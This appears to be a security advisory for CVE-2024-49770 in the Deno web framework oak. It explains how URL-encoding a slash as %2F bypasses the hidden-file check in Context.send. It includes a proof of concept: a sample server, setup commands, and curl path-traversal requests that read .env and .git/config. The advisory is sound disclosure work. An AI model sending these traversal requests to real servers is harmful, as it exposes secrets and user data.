CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/E:P
AI Score
Confidence
High
EPSS
Percentile
16.7%
By default oak
does not allow transferring of hidden files with Context.send
API. However, this can be bypassed by
encoding /
as its URL encoded form %2F
.
1.) Oak uses decodeComponent which seems to be unexpected. This is also the reason why it is not possible to access a file that
contains URL encoded characters unless the client URL encodes it first.
2.) The function isHidden is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from subdir/.env
.
// server.ts
import { Application } from "jsr:@oak/[email protected]";
const app = new Application();
app.use(async (context, next) => {
try {
await context.send({
root: './root',
hidden: false, // default
});
} catch {
await next();
}
});
await app.listen({ port: 8000 });
In terminal:
# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops > root/.git/config
# start server
deno run -A server.ts
# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config
For an attacker this has potential to read sensitive user data or to gain access to server secrets.
github.com/advisories/GHSA-qm92-93fv-vh7m
github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125
github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25
github.com/oakserver/oak/commit/4b2f27efd5cba5a45b2c3982e610da3af0869209
github.com/oakserver/oak/security/advisories/GHSA-qm92-93fv-vh7m
nvd.nist.gov/vuln/detail/CVE-2024-49770